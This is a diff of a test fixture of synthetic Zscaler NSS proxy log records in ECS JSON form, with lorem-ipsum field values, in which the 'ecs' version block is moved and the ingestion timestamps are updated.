"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupt ZSCALERNSS: time=volup Feb 12 1:12:33 2016^^timezone=CT^^action=Allowed^^reason=failure^^hostname=eosquir5191.www.example^^protocol=rdp^^serverip=10.173.22.152^^url=https://internal.example.net/isiutal/moenimi.jpg?gnaali=enatus#mquia^^urlcategory=ameaqu^^urlclass=aqu^^dlpdictionaries=utper^^dlpengine=squame^^filetype=ntex^^threatcategory=eius^^threatclass=luptat^^pagerisk=emape^^threatname=aer^^clientpublicIP=lupt^^ClientIP=10.26.46.95^^location=uame^^refererURL=https://www.example.net/orisn/cca.htm?ofdeF=metcons#roinBCS^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=com^^user=eataevi^^event_id=byC^^clienttranstime=tinculp^^requestmethod=tur^^requestsize=2977^^requestversion=equat^^status=atemsequ^^responsesize=2004^^responseversion=minim^^transactionsize=7868", "event": { - "ingested": "2021-06-14T08:26:19.844707300Z" + "ingested": "2021-12-14T14:59:54.590716461Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amco ZSCALERNSS: time=exe Feb 26 8:15:08 2016^^timezone=CT^^action=Blocked^^reason=success^^hostname=orsitame3262.domain^^protocol=igmp^^serverip=10.204.86.149^^url=https://example.com/taspe/mvolu.gif?atcup=snos#iquaUte^^urlcategory=tconsec^^urlclass=nsequat^^dlpdictionaries=taev^^dlpengine=roidents^^filetype=oluptas^^threatcategory=llu^^threatclass=uptassi^^pagerisk=tamremap^^threatname=tur^^clientpublicIP=aperi^^ClientIP=10.254.146.57^^location=estqui^^refererURL=https://www5.example.net/emaper/ssitasp.html?enimad=rmagni#sit^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=onev^^user=tenima^^event_id=laboreet^^clienttranstime=aquaeabi^^requestmethod=giatq^^requestsize=2935^^requestversion=veleumi^^status=tia^^responsesize=1837^^responseversion=ude^^transactionsize=6905", "event": { - "ingested": "2021-06-14T08:26:19.844714500Z" + "ingested": "2021-12-14T14:59:54.590716960Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uian ZSCALERNSS: time=tempo Mar 12 3:17:42 2016^^timezone=PST^^action=Allowed^^reason=failure^^hostname=tempor4496.www.localdomain^^protocol=ipv6^^serverip=10.103.246.190^^url=https://api.example.org/doloreeu/pori.jpg?itati=mfu#uid^^urlcategory=atatnonp^^urlclass=uiano^^dlpdictionaries=mrema^^dlpengine=autfu^^filetype=natura^^threatcategory=aboris^^threatclass=ima^^pagerisk=tanimi^^threatname=nimadmin^^clientpublicIP=erep^^ClientIP=10.252.125.53^^location=ugiatqu^^refererURL=https://internal.example.net/Utenimad/nibusBon.html?emq=isiu#nimadmi^^useragent=Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ari^^user=equun^^event_id=suntinc^^clienttranstime=elits^^requestmethod=llam^^requestsize=3077^^requestversion=gelits^^status=tatevel^^responsesize=3856^^responseversion=uptatev^^transactionsize=4292", "event": { - "ingested": "2021-06-14T08:26:19.844720400Z" + "ingested": "2021-12-14T14:59:54.590717498Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmi ZSCALERNSS: time=olab Mar 26 10:20:16 2016^^timezone=GMT-07:00^^action=Blocked^^reason=unknown^^hostname=ore2933.www.test^^protocol=ipv6-icmp^^serverip=10.61.78.108^^url=https://api.example.com/ele/tenbyCic.gif?porainc=amquisno#iinea^^urlcategory=ipit^^urlclass=idexea^^dlpdictionaries=riat^^dlpengine=luptatem^^filetype=umdolor^^threatcategory=osquir^^threatclass=inim^^pagerisk=ema^^threatname=roinBCSe^^clientpublicIP=onse^^ClientIP=10.136.153.149^^location=animi^^refererURL=https://www5.example.org/ofdeF/tion.htm?emqu=lit#iam^^useragent=Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ciati^^user=ercit^^event_id=umdolore^^clienttranstime=eniam^^requestmethod=reetdolo^^requestsize=2451^^requestversion=onse^^status=rumet^^responsesize=5772^^responseversion=tatno^^transactionsize=6787", "event": { - "ingested": "2021-06-14T08:26:19.844727400Z" + "ingested": "2021-12-14T14:59:54.590718065Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "llam ZSCALERNSS: time=aspern Apr 9 5:22:51 2016^^timezone=GMT-07:00^^action=Allowed^^reason=success^^hostname=ollit4105.mail.localdomain^^protocol=ipv6-icmp^^serverip=10.183.16.166^^url=https://mail.example.org/sitas/ehenderi.jpg?atquovo=iumto#aboreetd^^urlcategory=sun^^urlclass=essecill^^dlpdictionaries=Duisau^^dlpengine=psum^^filetype=eriame^^threatcategory=lorema^^threatclass=avol^^pagerisk=labor^^threatname=atuse^^clientpublicIP=ddoeiu^^ClientIP=10.66.250.92^^location=onse^^refererURL=https://example.com/metcon/smo.jpg?upta=omn#ipsumq^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=ons^^user=tessec^^event_id=remipsum^^clienttranstime=liq^^requestmethod=ist^^requestsize=571^^requestversion=caecatc^^status=onsequat^^responsesize=2984^^responseversion=edquiano^^transactionsize=6061", "event": { - "ingested": "2021-06-14T08:26:19.844733Z" + "ingested": "2021-12-14T14:59:54.590718547Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ema ZSCALERNSS: time=par Apr 24 12:25:25 2016^^timezone=PT^^action=Blocked^^reason=unknown^^hostname=cup1793.local^^protocol=ipv6^^serverip=10.243.224.205^^url=https://mail.example.net/aborumSe/luptat.txt?antiumto=strude#ctetura^^urlcategory=usmod^^urlclass=edqui^^dlpdictionaries=mquidol^^dlpengine=ita^^filetype=ipi^^threatcategory=rsitamet^^threatclass=lupt^^pagerisk=xea^^threatname=qua^^clientpublicIP=luptatev^^ClientIP=10.123.104.59^^location=uisquam^^refererURL=https://api.example.com/loremq/lores.txt?iqui=etc#etM^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=eprehen^^user=xercitat^^event_id=lpa^^clienttranstime=entsu^^requestmethod=dun^^requestsize=941^^requestversion=aliq^^status=rsitam^^responsesize=2053^^responseversion=imaven^^transactionsize=152", "event": { - "ingested": "2021-06-14T08:26:19.844738100Z" + "ingested": "2021-12-14T14:59:54.590719055Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tema ZSCALERNSS: time=ritatis May 8 7:27:59 2016^^timezone=GMT+02:00^^action=Blocked^^reason=unknown^^hostname=icab4668.local^^protocol=udp^^serverip=10.119.185.63^^url=https://www5.example.net/ntutla/equa.jpg?civeli=errorsi#des^^urlcategory=rehe^^urlclass=ume^^dlpdictionaries=incidi^^dlpengine=picia^^filetype=mUtenima^^threatcategory=emaperi^^threatclass=tame^^pagerisk=tinvol^^threatname=tectobe^^clientpublicIP=colabor^^ClientIP=10.74.17.5^^location=untut^^refererURL=https://internal.example.net/ommod/sequatur.txt?tlabo=suntexp#ugiatnu^^useragent=Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80^^department=itecto^^user=erc^^event_id=amqu^^clienttranstime=uines^^requestmethod=nsec^^requestsize=6907^^requestversion=estqu^^status=inibusBo^^responsesize=6888^^responseversion=ostrume^^transactionsize=6051", "event": { - "ingested": "2021-06-14T08:26:19.844743300Z" + "ingested": "2021-12-14T14:59:54.590719447Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "upt ZSCALERNSS: time=uiineavo May 22 2:30:33 2016^^timezone=CET^^action=Allowed^^reason=unknown^^hostname=aperia4409.www5.invalid^^protocol=rdp^^serverip=10.78.151.178^^url=https://api.example.net/atvol/umiur.txt?tati=utaliqu#oriosamn^^urlcategory=deFinibu^^urlclass=iadese^^dlpdictionaries=imidest^^dlpengine=emagnama^^filetype=eprehend^^threatcategory=hil^^threatclass=atquovo^^pagerisk=suntinc^^threatname=xeac^^clientpublicIP=nidolo^^ClientIP=10.25.192.202^^location=intoccae^^refererURL=https://www.example.net/pida/nse.html?emeumfu=CSed#lupt^^useragent=Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ecillu^^user=quip^^event_id=mporain^^clienttranstime=icons^^requestmethod=amvolup^^requestsize=7700^^requestversion=temveleu^^status=colabo^^responsesize=6354^^responseversion=orinrepr^^transactionsize=6578", "event": { - "ingested": "2021-06-14T08:26:19.844748400Z" + "ingested": "2021-12-14T14:59:54.590719909Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rumetM ZSCALERNSS: time=equi Jun 5 9:33:08 2016^^timezone=GMT+02:00^^action=Allowed^^reason=success^^hostname=sitvolup368.internal.host^^protocol=igmp^^serverip=10.71.170.37^^url=https://mail.example.net/equep/iavolu.gif?aqu=rpo#uipe^^urlcategory=inesci^^urlclass=serror^^dlpdictionaries=aliqu^^dlpengine=olupta^^filetype=mipsumd^^threatcategory=eFinib^^threatclass=ihilm^^pagerisk=atDu^^threatname=eav^^clientpublicIP=ionevo^^ClientIP=10.135.225.244^^location=orev^^refererURL=https://api.example.net/quirat/llu.jpg?isc=aturve#emulla^^useragent=Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=atiset^^user=atu^^event_id=umexerci^^clienttranstime=ern^^requestmethod=psaquae^^requestsize=7355^^requestversion=nsectet^^status=utla^^responsesize=5269^^responseversion=sci^^transactionsize=2526", "event": { - "ingested": "2021-06-14T08:26:19.844765Z" + "ingested": "2021-12-14T14:59:54.590720299Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tlabori ZSCALERNSS: time=oin Jun 20 4:35:42 2016^^timezone=ET^^action=Allowed^^reason=success^^hostname=ite2026.www.invalid^^protocol=udp^^serverip=10.223.247.86^^url=https://example.org/bor/occa.htm?dol=leumiu#namali^^urlcategory=taevit^^urlclass=rinrepre^^dlpdictionaries=etconse^^dlpengine=tincu^^filetype=ari^^threatcategory=exercit^^threatclass=sci^^pagerisk=quamnih^^threatname=oluptate^^clientpublicIP=onseq^^ClientIP=10.19.145.131^^location=texp^^refererURL=https://internal.example.net/acc/amc.txt?amest=corp#modtemp^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=oluptas^^user=tNequepo^^event_id=lup^^clienttranstime=nula^^requestmethod=emseq^^requestsize=821^^requestversion=ento^^status=pic^^responsesize=752^^responseversion=eriamea^^transactionsize=7741", "event": { - "ingested": "2021-06-14T08:26:19.844826500Z" + "ingested": "2021-12-14T14:59:54.590720677Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rsita ZSCALERNSS: time=niamqui Jul 4 11:38:16 2016^^timezone=GMT-07:00^^action=Allowed^^reason=failure^^hostname=radipisc7020.home^^protocol=ipv6^^serverip=10.2.53.125^^url=https://internal.example.net/oru/temqu.htm?etMalor=ipi#reseos^^urlcategory=pariatu^^urlclass=tin^^dlpdictionaries=tenima^^dlpengine=tsedqu^^filetype=agnid^^threatcategory=proide^^threatclass=dolorem^^pagerisk=tlab^^threatname=volupt^^clientpublicIP=osqui^^ClientIP=10.181.80.139^^location=hitecto^^refererURL=https://www.example.net/liquide/etdol.jpg?uun=sequine#ectio^^useragent=Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36^^department=aboN^^user=ihilmo^^event_id=radi^^clienttranstime=gel^^requestmethod=lorsitam^^requestsize=6408^^requestversion=veniam^^status=ris^^responsesize=3314^^responseversion=ulapa^^transactionsize=7298", "event": { - "ingested": "2021-06-14T08:26:19.844838300Z" + "ingested": "2021-12-14T14:59:54.590721219Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quioffi ZSCALERNSS: time=uptate Jul 18 6:40:50 2016^^timezone=ET^^action=Allowed^^reason=unknown^^hostname=uamei2493.www.test^^protocol=tcp^^serverip=10.31.240.6^^url=https://mail.example.net/itatione/isnis.html?oluptate=issus#osamn^^urlcategory=isnisiu^^urlclass=bore^^dlpdictionaries=tsu^^dlpengine=tcons^^filetype=sciun^^threatcategory=sBono^^threatclass=catc^^pagerisk=nsect^^threatname=idata^^clientpublicIP=rumwritt^^ClientIP=10.167.98.76^^location=dol^^refererURL=https://api.example.org/citation/tisetq.html?Utenimad=orpor#tlabo^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=gnido^^user=ratvolu^^event_id=olup^^clienttranstime=numqua^^requestmethod=veni^^requestsize=3140^^requestversion=abo^^status=veniamqu^^responsesize=2742^^responseversion=aliquide^^transactionsize=3073", "event": { - "ingested": "2021-06-14T08:26:19.844845300Z" + "ingested": "2021-12-14T14:59:54.590721663Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "equat ZSCALERNSS: time=derit Aug 2 1:43:25 2016^^timezone=PT^^action=Allowed^^reason=success^^hostname=piscin6866.internal.host^^protocol=udp^^serverip=10.0.55.9^^url=https://www.example.org/eporr/xeacomm.html?aturQui=utlabor#rau^^urlcategory=idex^^urlclass=mfugiat^^dlpdictionaries=nisiuta^^dlpengine=tvolu^^filetype=ecte^^threatcategory=tinvolu^^threatclass=iurer^^pagerisk=iciadese^^threatname=quidolor^^clientpublicIP=tessec^^ClientIP=10.135.160.125^^location=mve^^refererURL=https://internal.example.com/uisau/eleum.htm?nre=ercitat#inim^^useragent=Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36^^department=Utenima^^user=volupta^^event_id=rcitati^^clienttranstime=eni^^requestmethod=ionevo^^requestsize=3616^^requestversion=Ute^^status=sperna^^responsesize=5368^^responseversion=mnisi^^transactionsize=509", "event": { - "ingested": "2021-06-14T08:26:19.844850700Z" + "ingested": "2021-12-14T14:59:54.590722594Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tDuisaut ZSCALERNSS: time=oinBC Aug 16 8:45:59 2016^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=spi3544.www.host^^protocol=ggp^^serverip=10.63.250.128^^url=https://internal.example.net/ptatemq/luptatev.html?Nequepo=ipsumd#ntocc^^urlcategory=uteirure^^urlclass=nevo^^dlpdictionaries=ide^^dlpengine=aali^^filetype=adip^^threatcategory=tium^^threatclass=nnum^^pagerisk=tenbyCi^^threatname=ate^^clientpublicIP=uiac^^ClientIP=10.111.187.12^^location=itam^^refererURL=https://www.example.org/santiumd/turadip.gif?niamqui=orem#sno^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=tev^^user=saute^^event_id=ntocca^^clienttranstime=ostru^^requestmethod=ntoccae^^requestsize=1705^^requestversion=rrorsi^^status=temquiav^^responsesize=6027^^responseversion=sec^^transactionsize=1927", "event": { - "ingested": "2021-06-14T08:26:19.844855800Z" + "ingested": "2021-12-14T14:59:54.590722996Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sBon ZSCALERNSS: time=orro Aug 30 3:48:33 2016^^timezone=PST^^action=Allowed^^reason=unknown^^hostname=tlab5981.www.host^^protocol=igmp^^serverip=10.5.126.127^^url=https://www5.example.com/tateve/itinvol.txt?tenatus=cipitlab#ipsumd^^urlcategory=antiu^^urlclass=uirati^^dlpdictionaries=oin^^dlpengine=exe^^filetype=imadmini^^threatcategory=sauteiru^^threatclass=mod^^pagerisk=hilm^^threatname=ataevi^^clientpublicIP=com^^ClientIP=10.252.124.150^^location=trud^^refererURL=https://mail.example.org/litessec/itas.htm?uidol=mporin#mwrit^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=roid^^user=inibusB^^event_id=eprehen^^clienttranstime=entor^^requestmethod=xeacomm^^requestsize=1940^^requestversion=utp^^status=ema^^responsesize=1394^^responseversion=itessequ^^transactionsize=7688", "event": { - "ingested": "2021-06-14T08:26:19.844860600Z" + "ingested": "2021-12-14T14:59:54.590723395Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ine ZSCALERNSS: time=lup Sep 13 10:51:07 2016^^timezone=CT^^action=Blocked^^reason=success^^hostname=upida508.example^^protocol=tcp^^serverip=10.201.171.120^^url=https://api.example.net/tquiin/tse.jpg?ovol=ptasn#taedicta^^urlcategory=itam^^urlclass=str^^dlpdictionaries=idolore^^dlpengine=pid^^filetype=illoin^^threatcategory=tanimid^^threatclass=umdo^^pagerisk=natuse^^threatname=gnamal^^clientpublicIP=metMalo^^ClientIP=10.91.126.231^^location=reprehen^^refererURL=https://example.net/psumquia/ven.html?siutali=amnih#ium^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=tau^^user=exercita^^event_id=ris^^clienttranstime=eumiu^^requestmethod=orumSe^^requestsize=728^^requestversion=isnost^^status=queips^^responsesize=248^^responseversion=itess^^transactionsize=52", "event": { - "ingested": "2021-06-14T08:26:19.844865400Z" + "ingested": "2021-12-14T14:59:54.590723901Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ofdeFini ZSCALERNSS: time=irat Sep 28 5:53:42 2016^^timezone=GMT+02:00^^action=Allowed^^reason=unknown^^hostname=oditem5255.api.localdomain^^protocol=tcp^^serverip=10.135.82.97^^url=https://mail.example.org/olor/ineavo.gif?mquelau=iadolor#amcol^^urlcategory=adeser^^urlclass=oin^^dlpdictionaries=mvenia^^dlpengine=madminim^^filetype=fugitsed^^threatcategory=quam^^threatclass=quid^^pagerisk=fugiat^^threatname=atisun^^clientpublicIP=esci^^ClientIP=10.107.251.87^^location=fugi^^refererURL=https://www.example.net/iduntu/idestlab.htm?avol=icero#xer^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=nturma^^user=str^^event_id=iat^^clienttranstime=etur^^requestmethod=itecto^^requestsize=1300^^requestversion=borios^^status=tut^^responsesize=2703^^responseversion=umqu^^transactionsize=301", "event": { - "ingested": "2021-06-14T08:26:19.844870200Z" + "ingested": "2021-12-14T14:59:54.590724397Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "adipisc ZSCALERNSS: time=uscipitl Oct 12 12:56:16 2016^^timezone=PST^^action=Blocked^^reason=unknown^^hostname=uamei2389.internal.example^^protocol=ipv6-icmp^^serverip=10.31.198.58^^url=https://www.example.com/its/ender.gif?oles=edic#seq^^urlcategory=tutlab^^urlclass=sau^^dlpdictionaries=atevelit^^dlpengine=meius^^filetype=billo^^threatcategory=labo^^threatclass=oNemoeni^^pagerisk=ttenby^^threatname=boris^^clientpublicIP=stenatu^^ClientIP=10.215.205.216^^location=ratv^^refererURL=https://www.example.net/ianon/tsed.htm?ameiusm=proide#ano^^useragent=Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=boreetdo^^user=aturve^^event_id=ditemp^^clienttranstime=edqui^^requestmethod=nre^^requestsize=7231^^requestversion=sit^^status=olab^^responsesize=100^^responseversion=elitse^^transactionsize=6672", "event": { - "ingested": "2021-06-14T08:26:19.844874900Z" + "ingested": "2021-12-14T14:59:54.590724795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quasia ZSCALERNSS: time=adi Oct 26 7:58:50 2016^^timezone=PST^^action=Allowed^^reason=failure^^hostname=eacommod1930.internal.lan^^protocol=igmp^^serverip=10.29.155.171^^url=https://www5.example.org/oeni/tdol.gif?llamco=nea#psum^^urlcategory=tasnulap^^urlclass=orsit^^dlpdictionaries=asiar^^dlpengine=ise^^filetype=itau^^threatcategory=apariat^^threatclass=vitaedi^^pagerisk=lorsita^^threatname=dolore^^clientpublicIP=uptate^^ClientIP=10.229.83.165^^location=ugiat^^refererURL=https://internal.example.com/ate/odoconse.jpg?quatu=veli#tenim^^useragent=Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]^^department=labo^^user=ulapar^^event_id=aboreetd^^clienttranstime=hilm^^requestmethod=llitanim^^requestsize=5047^^requestversion=pitl^^status=por^^responsesize=7205^^responseversion=ama^^transactionsize=332", "event": { - "ingested": "2021-06-14T08:26:19.844880600Z" + "ingested": "2021-12-14T14:59:54.590725176Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "adminimv ZSCALERNSS: time=odi Nov 10 3:01:24 2016^^timezone=GMT-07:00^^action=Blocked^^reason=success^^hostname=tem6984.www5.domain^^protocol=ipv6^^serverip=10.129.192.145^^url=https://www.example.com/uasiar/utlab.htm?loremqu=dantium#lor^^urlcategory=velillu^^urlclass=cteturad^^dlpdictionaries=bor^^dlpengine=rauto^^filetype=ationev^^threatcategory=umdolor^^threatclass=uaUten^^pagerisk=nby^^threatname=mve^^clientpublicIP=osqui^^ClientIP=10.161.148.64^^location=ibusBon^^refererURL=https://example.com/rQu/mco.jpg?dun=reprehe#tincu^^useragent=Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36^^department=dex^^user=lor^^event_id=oraincid^^clienttranstime=intocc^^requestmethod=amcorp^^requestsize=1275^^requestversion=ssecillu^^status=liqua^^responsesize=6498^^responseversion=utodita^^transactionsize=4014", "event": { - "ingested": "2021-06-14T08:26:19.844901600Z" + "ingested": "2021-12-14T14:59:54.590725576Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "fdeF ZSCALERNSS: time=iquidexe Nov 24 10:03:59 2016^^timezone=CEST^^action=Allowed^^reason=failure^^hostname=lapariat7287.internal.host^^protocol=ggp^^serverip=10.7.200.140^^url=https://api.example.org/icabo/gna.html?urerepr=eseru#quamest^^urlcategory=mac^^urlclass=qui^^dlpdictionaries=ritin^^dlpengine=temporin^^filetype=equatur^^threatcategory=adeseru^^threatclass=tdol^^pagerisk=upt^^threatname=mex^^clientpublicIP=tatem^^ClientIP=10.203.65.161^^location=eveli^^refererURL=https://internal.example.com/oremq/dicta.htm?imide=poriss#tvolup^^useragent=Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=siu^^user=snost^^event_id=tpersp^^clienttranstime=llamc^^requestmethod=nte^^requestsize=3571^^requestversion=utali^^status=porinc^^responsesize=6392^^responseversion=mvolu^^transactionsize=1664", "event": { - "ingested": "2021-06-14T08:26:19.844910300Z" + "ingested": "2021-12-14T14:59:54.590726056Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipi ZSCALERNSS: time=imveniam Dec 8 5:06:33 2016^^timezone=GMT-07:00^^action=Blocked^^reason=unknown^^hostname=licabo1493.api.corp^^protocol=icmp^^serverip=10.86.22.67^^url=https://api.example.org/oremi/elites.html?iosa=boNemoe#onsequ^^urlcategory=equinesc^^urlclass=cab^^dlpdictionaries=atisund^^dlpengine=xea^^filetype=ites^^threatcategory=isetq^^threatclass=iutali^^pagerisk=velite^^threatname=teturad^^clientpublicIP=perspici^^ClientIP=10.218.98.29^^location=iconseq^^refererURL=https://www5.example.org/atisetqu/issuscip.jpg?dipisci=spernatu#admi^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=quunt^^user=olori^^event_id=mquae^^clienttranstime=eriti^^requestmethod=atcupi^^requestsize=2332^^requestversion=plica^^status=ore^^responsesize=7595^^responseversion=emqu^^transactionsize=2846", "event": { - "ingested": "2021-06-14T08:26:19.844917500Z" + "ingested": "2021-12-14T14:59:54.590726445Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "acommod ZSCALERNSS: time=itsedd Dec 23 12:09:07 2016^^timezone=CT^^action=Allowed^^reason=success^^hostname=stenatu4844.www.invalid^^protocol=rdp^^serverip=10.39.31.115^^url=https://example.com/luptatem/uaeratv.gif?dat=periam#dqu^^urlcategory=pid^^urlclass=rExc^^dlpdictionaries=iusmo^^dlpengine=tame^^filetype=naaliq^^threatcategory=nte^^threatclass=ulpa^^pagerisk=sitam^^threatname=rad^^clientpublicIP=loi^^ClientIP=10.24.111.229^^location=volupt^^refererURL=https://example.net/idid/tesse.txt?boru=ptateve#enderi^^useragent=Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36^^department=toccaec^^user=fugi^^event_id=labo^^clienttranstime=nostrud^^requestmethod=gnaal^^requestsize=7224^^requestversion=proident^^status=maliquam^^responsesize=2147^^responseversion=atione^^transactionsize=5702", "event": { - "ingested": "2021-06-14T08:26:19.844922900Z" + "ingested": "2021-12-14T14:59:54.590726956Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ritati ZSCALERNSS: time=orisni Jan 6 7:11:41 2017^^timezone=PST^^action=Blocked^^reason=failure^^hostname=sitam5077.internal.host^^protocol=igmp^^serverip=10.179.210.218^^url=https://www.example.org/tanimi/rumSecti.jpg?emporain=ntiumto#umetMalo^^urlcategory=oluptas^^urlclass=emvele^^dlpdictionaries=isnost^^dlpengine=olorem^^filetype=ido^^threatcategory=emqu^^threatclass=riss^^pagerisk=iquamqua^^threatname=sit^^clientpublicIP=rumSect^^ClientIP=10.32.39.220^^location=aliq^^refererURL=https://example.net/mven/olorsit.gif?oremag=illu#ruredo^^useragent=Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]^^department=tatevel^^user=boreetdo^^event_id=undeom^^clienttranstime=uamnihi^^requestmethod=risnis^^requestsize=1140^^requestversion=scingeli^^status=isn^^responsesize=4814^^responseversion=omm^^transactionsize=696", "event": { - "ingested": "2021-06-14T08:26:19.844928100Z" + "ingested": 